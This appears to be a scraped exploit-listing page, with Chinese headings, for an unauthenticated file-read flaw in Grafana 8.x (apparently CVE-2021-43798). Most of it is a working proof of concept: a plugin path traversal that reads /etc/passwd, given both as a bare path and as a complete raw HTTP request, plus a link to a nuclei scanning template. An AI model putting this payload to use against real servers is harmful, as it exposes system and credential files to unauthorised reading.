Share
## https://sploitus.com/exploit?id=62F06A45-7A90-5DB4-9E42-DFA965911DAF
# Grafana-File-Read
## Grafana未授权文件读取
> 影响版本:8.0.0-lastest
<img width="711" alt="wecom-temp-e380dc0174f4d9f46e9e217a6e2c3ddb" src="https://user-images.githubusercontent.com/45926593/144997417-b4d7aaa1-d58d-4a5f-a22c-e8b9b7f16763.png">
poc:
/public/plugins/icon/../../../../../../../../../../../../../../../../../../etc/passwd
```
GET /public/plugins/icon/../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1
Host: 127.0.0.1:3000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
```
nuclei的poc:
[grafana.yaml](https://github.com/tangxiaofeng7/CVE-2021-43798-Grafana-File-Read/blob/main/grafana.yaml)
